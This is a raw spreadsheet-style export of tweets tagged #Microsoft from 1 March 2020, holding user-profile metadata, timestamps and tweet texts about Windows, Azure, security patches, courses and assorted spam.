    <t>{'id': 801589615907913728, 'id_str': '801589615907913728', 'name': 'Primaxis', 'screen_name': 'PrimaxisAPAC', 'location': 'APAC', 'description': 'Primaxis believe possibilities are unlimited with technology solutions in Social Collaboration, Security, Cloud, Cognitive, Software Development and Mobility.', 'url': 'https://t.co/2eqypAqPQU', 'entities': {'url': {'urls': [{'url': 'https://t.co/2eqypAqPQU', 'expanded_url': 'http://www.primaxis.com', 'display_url': 'primaxis.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 14, 'listed_count': 2, 'created_at': 'Thu Nov 24 00:53:52 +0000 2016', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 118,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'http://pbs.twimg.com/profile_images/995906021347483648/7Ub_WE9k_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/995906021347483648/7Ub_WE9k_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/801589615907913728/1526278615',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</si>
  <si>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22:25:00 +0000 2020</t>
  </si>
  <si>
    <t>New user #tips to navigate #Windows10, the latest upgrade from #Microsoft https://t.co/oF96X5LfBP via @usatoday</t>
  </si>
  <si>
    <t>Sun Mar 01 22:23:53 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/FCaJFmsRlw
Leverage #Azure #ExpressRoute to connect your global corporate WANs, build a hybrid cloud and enable cross location connectivity - all in minutes. #MicrosoftAzure
#microsoft #CloudComputing #cloud</t>
  </si>
  <si>
    <t>{'id': 19064908, 'id_str': '19064908', 'name': 'Janit', 'screen_name': 'janitvora', 'location': 'United Kingdom', 'description': 'Enterprise Architect, Telecom Consultant, Traveler, Blogger @http://www.janitvora.com', 'url': 'https://t.co/OI3l7JB10i', 'entities': {'url': {'urls': [{'url': 'https://t.co/OI3l7JB10i', 'expanded_url': 'http://www.janitvora.com', 'display_url': 'janitvora.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 235, 'friends_count': 416, 'listed_count': 19, 'created_at': 'Fri Jan 16 12:55:09 +0000 2009', 'favourites_count': 1008, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1709,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'http://pbs.twimg.com/profile_images/934901324348522496/ZsBLTdwu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/934901324348522496/ZsBLTdwu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19064908/1402723221',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</si>
  <si>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22:18:10 +0000 2020</t>
  </si>
  <si>
    <t>People are like musical instruments: their sound depends on who touches them #Omaha   #microsoft #videos https://t.co/oAjCbqIlDf</t>
  </si>
  <si>
    <t>{'id': 1234112467627913217, 'id_str': '1234112467627913217', 'name': 'Christina Estrada', 'screen_name': 'inelmoulde', 'location': 'Minneapolis, USA', 'description': 'No matter how dark the moment, love and hope are always possible', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 38, 'listed_count': 0, 'created_at': 'Sun Mar 01 13:45:21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'http://pbs.twimg.com/profile_images/1234120765580226560/pLH60OFy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234120765580226560/pLH60OFy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234112467627913217/1583072330',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</si>
  <si>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22:16:55 +0000 2020</t>
  </si>
  <si>
    <t>Touch is the most tender thing on earth
https://t.co/drKcbAXYYb
#Indiana
 #microsoft #fun https://t.co/zMRY0vxECc</t>
  </si>
  <si>
    <t>{'id': 1232376392568000513, 'id_str': '1232376392568000513', 'name': 'Renee Hernandez', 'screen_name': 'sitznorsoti', 'location': 'Peoria, USA', 'description': 'This small town hasnâ€™t got room', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 76, 'listed_count': 0, 'created_at': 'Tue Feb 25 18:46:49 +0000 2020', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 27, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232431085260288007/4EoX8AQc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232431085260288007/4EoX8AQc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1232376392568000513/1582713460',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</si>
  <si>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22:13:47 +0000 2020</t>
  </si>
  <si>
    <t>Put me on your To-do list #Fort Worth   #job #microsoft https://t.co/ljgWa3e0U1</t>
  </si>
  <si>
    <t>Sun Mar 01 22:10:14 +0000 2020</t>
  </si>
  <si>
    <t>#Blazor is the #Future of #softwaredevelopment  learn how to build a full client-side application with #Blazor #WebAssembly from this course now 
@aspnet
  #dotnet #dotnetcore #microsoft #technolgoy #courses #education 
https://t.co/JmUA6HnF0N https://t.co/gIm0VtgOYr</t>
  </si>
  <si>
    <t>Sun Mar 01 22:00:54 +0000 2020</t>
  </si>
  <si>
    <t>Testing Scary CREEPYPASTA Gacha Life Glitches 3 #microsoft https://t.co/teApjGOm34</t>
  </si>
  <si>
    <t>Sun Mar 01 22:00:02 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud. #transformation #Azure #Microsoft #MSFTAdvocate https://t.co/ujlayO5g9t</t>
  </si>
  <si>
    <t>Sun Mar 01 21:57:05 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint 2013/2016/2019:  How to replace expired WorkFlow Manager Certificates https://t.co/NXvjXBfpoH #Microsoft</t>
  </si>
  <si>
    <t>Sun Mar 01 21:50:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020 | ZDNet https://t.co/BQ5hU6ekvB</t>
  </si>
  <si>
    <t>{'id': 19663967, 'id_str': '19663967', 'name': 'Ara H.', 'screen_name': 'ARAinLA', 'location': 'Los Angeles, CA', 'description': 'Hospital IT Director/Car nut living in LA, CA. Thinking about and consuming technology while I dodge the cones on the track.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1065, 'friends_count': 2389, 'listed_count': 132, 'created_at': 'Wed Jan 28 17:38:00 +0000 2009', 'favourites_count': 1301, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16355,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'http://pbs.twimg.com/profile_images/731277266840211456/bpdsjpld_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/731277266840211456/bpdsjpld_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19663967/1357883003',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</si>
  <si>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21:48:13 +0000 2020</t>
  </si>
  <si>
    <t>I do not want a fairy tale, but I want your intimate affection! #Souix Falls  #microsoft #whatsapp https://t.co/6XVZsvKb4b</t>
  </si>
  <si>
    <t>{'id': 1234228084485824512, 'id_str': '1234228084485824512', 'name': 'Jennifer Wells', 'screen_name': 'asliperla', 'location': 'Columbia, USA', 'description': 'I look at you and see the rest of my life in front of my eyes.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Sun Mar 01 21:24:45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'http://pbs.twimg.com/profile_images/1234231713250840578/WptaU_cJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234231713250840578/WptaU_cJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234228084485824512/1583098777',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</si>
  <si>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21:48:02 +0000 2020</t>
  </si>
  <si>
    <t>Warning Issued For Millions Of Microsoft Windows 10 Users https://t.co/MfIkURO2HO #Microsoft hides file extensions in #Windows by default even though its a security risk that is commonly abused by #phishing emails and malware distributors. #ITSecurity #Malware #Windows10 https://t.co/vxWnVFcBam</t>
  </si>
  <si>
    <t>Sun Mar 01 21:46:26 +0000 2020</t>
  </si>
  <si>
    <t>Even more sexual content on my website  #LaSalle County   #microsoft #sports https://t.co/b4dO2JCpwA</t>
  </si>
  <si>
    <t>{'id': 1234129236451041286, 'id_str': '1234129236451041286', 'name': 'Jessica Green', 'screen_name': 'riasesofteaft', 'location': 'Washington, USA', 'description': 'You are my best friend, my human diary and my other half. You mean the world to me and I LOVE YOU.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Sun Mar 01 14:51:58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'http://pbs.twimg.com/profile_images/1234143389937029122/Y6nEdDUX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234143389937029122/Y6nEdDUX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234129236451041286/1583077727',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</si>
  <si>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21:42:52 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Linux Conference WSLconf Coming March 2020
 #OSS #Windows10 #WSL #Microsoft
https://t.co/lUq5jcvMfq</t>
  </si>
  <si>
    <t>Sun Mar 01 21:41:25 +0000 2020</t>
  </si>
  <si>
    <t>#Cybersecurity - Updates released recently by the following vendors to address vulnerabilities in their products: #Cisco, #Adobe, #Microsoft, #Google &amp;amp; #Mozilla. See details and links to the updates at https://t.co/9DeqIOSM9g. #malware #ransomware #breach #phishing #hacker https://t.co/S2j3xyIK5q</t>
  </si>
  <si>
    <t>{'id': 888926185769619456, 'id_str': '888926185769619456', 'name': 'BrillianTechSol', 'screen_name': 'BrillianTechSol', 'location': 'United States - 888-270-6120', 'description': 'Intuit QuickBooks Enterprise Premier Reseller. Providing Services such as Consulting, Project Management, Training, Setup, Programming &amp; Customer Support.', 'url': 'https://t.co/c0psJX0gJa', 'entities': {'url': {'urls': [{'url': 'https://t.co/c0psJX0gJa', 'expanded_url': 'http://www.brilliantechsolutions.com', 'display_url': 'brilliantechsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 2, 'listed_count': 4, 'created_at': 'Sun Jul 23 00:58:12 +0000 2017', 'favourites_count': 49, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2052, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/888929335998124032/ZESBbjdS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/888929335998124032/ZESBbjdS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/888926185769619456/1500782894',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</si>
  <si>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21:40:04 +0000 2020</t>
  </si>
  <si>
    <t>Why MFA is a top priority in 2020 https://t.co/34rwdCLMOZ #whitepaper
via @Azure #Microsoft #AAD #AD #Azure #MFA #MultifactorAuthentication #Security #Australia</t>
  </si>
  <si>
    <t>Sun Mar 01 21:37:55 +0000 2020</t>
  </si>
  <si>
    <t>#Cybersecurity - Updates released recently by the following vendors to address vulnerabilities in their products: #Cisco, #Adobe, #Microsoft, #Google &amp;amp; #Mozilla. See details and links to the updates at https://t.co/cDs4TQUSLV. #malware #ransomware #breach #phishing #hacker https://t.co/s7Cl5LQY15</t>
  </si>
  <si>
    <t>{'id': 165097973, 'id_str': '165097973', 'name': 'A B Computer Systems', 'screen_name': 'ABComputerSys', 'location': 'United States - 800-440-4082', 'description': 'Microsoft Dynamics, Azure, CRM, Power BI, SharePoint, SQL &amp; other Business Software: Implementation, Software Development &amp; Customer Support Services.', 'url': 'http://t.co/y5jfBfJdrE', 'entities': {'url': {'urls': [{'url': 'http://t.co/y5jfBfJdrE', 'expanded_url': 'http://www.abcsi.com', 'display_url': 'abcsi.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 151, 'friends_count': 5, 'listed_count': 18, 'created_at': 'Sat Jul 10 15:58:05 +0000 2010', 'favourites_count': 62, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 325,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'http://pbs.twimg.com/profile_images/888859100498481152/MZA3yEMa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/888859100498481152/MZA3yEMa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/165097973/1500754656',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</si>
  <si>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21:35:24 +0000 2020</t>
  </si>
  <si>
    <t>#Cybersecurity - Updates released recently by the following vendors to address vulnerabilities in their products: #Cisco, #Adobe, #Microsoft, #Google &amp;amp; #Mozilla. See details and links to the updates at https://t.co/abQk9oaOJK. #malware #ransomware #breach #phishing #hacker https://t.co/D6ygM640dM</t>
  </si>
  <si>
    <t>{'id': 887354013250932737, 'id_str': '887354013250932737', 'name': 'Business Sec Consult', 'screen_name': 'BusSecurConsult', 'location': '', 'description': 'Cybersecurity: Threat Assessment, Vulnerability Mgmt, Detection &amp; Defense, Incident Response, Compliance &amp; Training. https://t.co/BBzxDeNv4t', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/BBzxDeNv4t', 'expanded_url': 'http://businesssecurityconsultants.com/', 'display_url': 'businesssecurityconsultants.com', 'indices': [117, 140]}]}}, 'protected': False, 'followers_count': 15, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Tue Jul 18 16:50:57 +0000 2017', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 100, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/889839728740241409/ObcqZ0Fj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/889839728740241409/ObcqZ0Fj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/887354013250932737/1500397845',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</si>
  <si>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21:35:07 +0000 2020</t>
  </si>
  <si>
    <t>Now #Microsoft Wants To Secure Your #iPhone  https://t.co/sj5ZAoq1oT</t>
  </si>
  <si>
    <t>{'id': 221759028, 'id_str': '221759028', 'name': 'Power AdmÃ¬n', 'screen_name': 'poweradmn', 'location': 'Kansas City, USA', 'description': 'PA Server Monitorâ„¢: Server &amp; Network Monitoring Software Tools for IT Pros. PA File Sightâ„¢: File Monitor &amp; File Audit Software. Custom Alerts &amp; Reports.', 'url': 'http://t.co/JYJWv4cpjV', 'entities': {'url': {'urls': [{'url': 'http://t.co/JYJWv4cpjV', 'expanded_url': 'http://www.poweradmin.com', 'display_url': 'poweradmin.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5749, 'friends_count': 3697, 'listed_count': 200, 'created_at': 'Wed Dec 01 14:49:30 +0000 2010', 'favourites_count': 48, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8186, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3584D3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/429301143726854144/UqmHqM3B_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/429301143726854144/UqmHqM3B_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/221759028/1430250759', 'profile_link_color': '3B94D9',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</si>
  <si>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Sun Mar 01 21:32:07 +0000 2020</t>
  </si>
  <si>
    <t>#KPMG combines #CyberSecurity, #data management and industry experience with #Microsofts technology to help clients improve their business protection. https://t.co/ieJfbgBwxL</t>
  </si>
  <si>
    <t>{'id': 362472746, 'id_str': '362472746', 'name': 'Marjorie Rijkse', 'screen_name': 'MarjorieRijkse', 'location': 'Den Haag', 'description': 'Marketing l Communicatie l Adviseur l Publieke Sector l Skien l', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 95, 'friends_count': 180, 'listed_count': 7, 'created_at': 'Fri Aug 26 13:17:08 +0000 2011', 'favourites_count': 150, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 602,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'http://pbs.twimg.com/profile_images/3215099996/8591401741fe6b359f316bbeb8171064_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3215099996/8591401741fe6b359f316bbeb8171064_normal.jpeg',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</si>
  <si>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21:29:55 +0000 2020</t>
  </si>
  <si>
    <t>AirSim-rs 0.2.0 is out, now featuring keyboard arrows! Join the fun on twitch and let's build awesome products in Rust together! https://t.co/pkZTMeqJ08 #rustlang #airsim #microsoft https://t.co/62L572DCif</t>
  </si>
  <si>
    <t>{'id': 393442628, 'id_str': '393442628', 'name': 'o0Ignition0o', 'screen_name': 'o0ignition0o', 'location': 'Lille, France', 'description': 'ðŸ’» Computers at day, ðŸ“–books at night. he/his. Memecheologist.', 'url': 'https://t.co/nQ2RgnMmE1', 'entities': {'url': {'urls': [{'url': 'https://t.co/nQ2RgnMmE1', 'expanded_url': 'http://blog.jeremylempereur.com', 'display_url': 'blog.jeremylempereur.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 976, 'friends_count': 3086, 'listed_count': 40, 'created_at': 'Tue Oct 18 15:02:05 +0000 2011', 'favourites_count': 41266, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4447,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'http://pbs.twimg.com/profile_images/1199032163053789184/eEydJ_z3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199032163053789184/eEydJ_z3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/393442628/1522575868',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</si>
  <si>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21:26:10 +0000 2020</t>
  </si>
  <si>
    <t>Ready when you are  Enroll Today  Study at YOUR own Pace  Learn and Earn  Get Certified - #Microsoft Approved  ENROLL TODAY! -  https://t.co/cVkaPu7HDg https://t.co/HMK94NEcg8</t>
  </si>
  <si>
    <t>Sun Mar 01 21:20:39 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft really needs to observe the average user of #Windows10 and note the following:
1) The number times they swear at their computer for Windows 10 issues.
2) The issues they're swearing at.
3) How virulently people swear at Windows 10.
Why do audio drivers just disappear?</t>
  </si>
  <si>
    <t>{'id': 700914517, 'id_str': '700914517', 'name': 'Rain Stickland', 'screen_name': 'RainStickland', 'location': 'Canada', 'description': 'Author of novels #TippingPoint and #GroundZero. Journalist. Autistic. Mouthy Canadian who takes crap from no one. Ferret-crazy. No political pigeonhole.', 'url': 'https://t.co/0F2WVeeHqe', 'entities': {'url': {'urls': [{'url': 'https://t.co/0F2WVeeHqe', 'expanded_url': 'http://www.rainstickland.ca', 'display_url': 'rainstickland.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 747, 'friends_count': 1630, 'listed_count': 29, 'created_at': 'Tue Jul 17 11:49:40 +0000 2012', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4418, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '030103', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1149562191894286337/rMMVNLwg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149562191894286337/rMMVNLwg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/700914517/1562912437', 'profile_link_color': '750691', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': 'FA8459', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sun Mar 01 21:16:54 +0000 2020</t>
  </si>
  <si>
    <t>I've noticed two warnings during the #MEMCM installation wizard. I checked the configuration and everything is set correct! Ran the "Run Check" again and then the SQL warning was gone... Is it a BUG?
-Windows Server 2019
-SQL Server 2019
-ConfigMgr 1902
#ConfigMgr #Microsoft https://t.co/TUm8i5u9Yf</t>
  </si>
  <si>
    <t>{'id': 850643487141896193, 'id_str': '850643487141896193', 'name': 'Sune Thomsen', 'screen_name': 'SuneThomsenDK', 'location': 'Denmark', 'description': 'Client Management Specialist at MOE Artelia Group focusing on Modern Management #ConfigMgr | #MSIntune | #MEM | #Windows10 | All tweets &amp; opinions are my own.', 'url': 'https://t.co/2d6NUYjGsP', 'entities': {'url': {'urls': [{'url': 'https://t.co/2d6NUYjGsP', 'expanded_url': 'https://www.osdsune.com', 'display_url': 'osdsune.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1204, 'friends_count': 225, 'listed_count': 22, 'created_at': 'Sat Apr 08 09:36:26 +0000 2017', 'favourites_count': 2318, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1472,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'http://pbs.twimg.com/profile_images/850654341589544960/faDWba5Q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/850654341589544960/faDWba5Q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/850643487141896193/1552566370',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</si>
  <si>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21:15:57 +0000 2020</t>
  </si>
  <si>
    <t>Be nice to me. I am a good girl! #Greene County   #sweden #microsoft https://t.co/lK2seFzmDt</t>
  </si>
  <si>
    <t>{'id': 1234110430148284416, 'id_str': '1234110430148284416', 'name': 'Andrea Dalton', 'screen_name': 'cherfalenlou', 'location': 'Peoria, USA', 'description': 'Chemistry is you touching my arm and setting fire to my mind.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 57, 'listed_count': 0, 'created_at': 'Sun Mar 01 13:37:15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'http://pbs.twimg.com/profile_images/1234113737621221378/uDXLuU1b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234113737621221378/uDXLuU1b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234110430148284416/1583070649',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</si>
  <si>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21:14:33 +0000 2020</t>
  </si>
  <si>
    <t>#Kremlin #Russia ARE illegally #Hacking2020 to #Subvert2020 like they did in 2016  #Microsoft &amp;amp; ALL U. S. #Intelligence services know #RussianCollusion is STILL happening!  #Liar #TrumpisaRussianAsset Media Still Like Bernie, Cause They Love Trump
https://t.co/ZxdjVKzdDG</t>
  </si>
  <si>
    <t>{'id': 330878931, 'id_str': '330878931', 'name': 'Buddy Princeton', 'screen_name': 'BuddyPrinceton', 'location': 'Newport Beach', 'description': 'Musician, songwriter, producer, from Newport Beach. The Incorruptibles are Buddy Princeton, John Barnes &amp; others.  Producer &amp; mentor is LEGENDARY Ronnie King', 'url': 'http://t.co/fXNSzFh9Qi', 'entities': {'url': {'urls': [{'url': 'http://t.co/fXNSzFh9Qi', 'expanded_url': 'http://www.BuddyPrinceton.com', 'display_url': 'BuddyPrinceton.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 309, 'friends_count': 1399, 'listed_count': 15, 'created_at': 'Thu Jul 07 09:07:30 +0000 2011', 'favourites_count': 2101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13909,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'http://pbs.twimg.com/profile_images/2539179769/va5abtzajbs68iidy1aq_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2539179769/va5abtzajbs68iidy1aq_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/330878931/1474138959',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</si>
  <si>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Sun Mar 01 21:14:17 +0000 2020</t>
  </si>
  <si>
    <t>New Windows 10 Update Fails To Fix The Nasty Windows Search Problem For Everyone 
https://t.co/Ek0Gk0yQ4d - #Microsoft #Windows10 #Windows10Update #WindowsUpdateErrors https://t.co/T3NOlVzej0</t>
  </si>
  <si>
    <t>{'id': 734443559739396096, 'id_str': '734443559739396096', 'name': 'Appuals', 'screen_name': 'appuals', 'location': '', 'description': '', 'url': 'https://t.co/PiD1wAQsCH', 'entities': {'url': {'urls': [{'url': 'https://t.co/PiD1wAQsCH', 'expanded_url': 'https://appuals.com', 'display_url': 'appuals.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 112, 'friends_count': 1, 'listed_count': 4, 'created_at': 'Sun May 22 17:59:24 +0000 2016', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2376,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'http://pbs.twimg.com/profile_images/1001436951642337281/TNMkYTyo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1001436951642337281/TNMkYTyo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/734443559739396096/1527596248',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</si>
  <si>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21:12:41 +0000 2020</t>
  </si>
  <si>
    <t>if you see this let me tell you something. you are eligible for a free microsof upgrade #ToriesFault #microsoft #india #depperession</t>
  </si>
  <si>
    <t>{'id': 909461182242795520, 'id_str': '909461182242795520', 'name': 'Rahul Johnson', 'screen_name': 'iimaplez', 'location': 'dumpster', 'description': 'I served the indian tech support arme for 50 yearz abd i hfve a sun called Johnson Rahul dank you ferry much abdn i am aloso a part time terrorist', 'url': 'https://t.co/NmELbj3yXf', 'entities': {'url': {'urls': [{'url': 'https://t.co/NmELbj3yXf', 'expanded_url': 'http://www.yourscamhere.com', 'display_url': 'yourscamhere.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Sun Sep 17 16:56:57 +0000 2017', 'favourites_count': 2,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'http://pbs.twimg.com/profile_images/1231200554589839367/H4RBYR9g_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231200554589839367/H4RBYR9g_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/909461182242795520/1583096791',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</si>
  <si>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21:12:11 +0000 2020</t>
  </si>
  <si>
    <t>#Repost forzamotorsportofficial
A beauty from all angles.  
Photo by starborn_prsx submitted through #ForzaShare.
#ForzaHorizon4 #xboxone #microsoft #gamer #games #player #esports #videogames #brasil... https://t.co/lkw5mRd9Qd</t>
  </si>
  <si>
    <t>{'id': 1125942207725428736, 'id_str': '1125942207725428736', 'name': 'Brandoff E-Sports', 'screen_name': 'brandoffesports', 'location': 'SÃ£o Paulo, Brasil', 'description': 'E-Sports Org.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 359, 'listed_count': 0, 'created_at': 'Wed May 08 01:55:16 +0000 2019', 'favourites_count': 11,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'http://pbs.twimg.com/profile_images/1201218308491624455/4diHYS0M_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1201218308491624455/4diHYS0M_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1125942207725428736/1575227737',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</si>
  <si>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21:06:37 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Deep Learning Prerequisites: Linear Regression in Python #udemycoupon -&amp;gt; https://t.co/NAiLuU8DvU
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Sun Mar 01 21:04:10 +0000 2020</t>
  </si>
  <si>
    <t>"Rome Call for AI Ethics"
Transparency
Inclusion
Responsibility
Impartiality
Reliability
Security and Privacy
Once again, Microsoft is helping to shape the future...
 #microsoft #AI #privacy  #cybersecurity https://t.co/WbqtFrbCaN</t>
  </si>
  <si>
    <t>{'id': 292026803, 'id_str': '292026803', 'name': 'Charles Tostain', 'screen_name': 'CharlesTostain', 'location': '', 'description': 'Global Black Belt Cybersecurity &amp; Compliance - Microsoft EMEA - Think, Feel, Create', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 122, 'listed_count': 6, 'created_at': 'Tue May 03 00:23:20 +0000 2011', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 106,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'http://pbs.twimg.com/profile_images/1041094580354072578/Ia3pWO8g_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041094580354072578/Ia3pWO8g_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/292026803/1523867274',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</si>
  <si>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21:02:44 +0000 2020</t>
  </si>
  <si>
    <t>Coming soon... #twitch #twitchprime #twitchbrasil #game #warzone #apexlegends #sony #microsoft #asrock #amd #ryzen #rdna #hardware https://t.co/q5UNV3ZRv6</t>
  </si>
  <si>
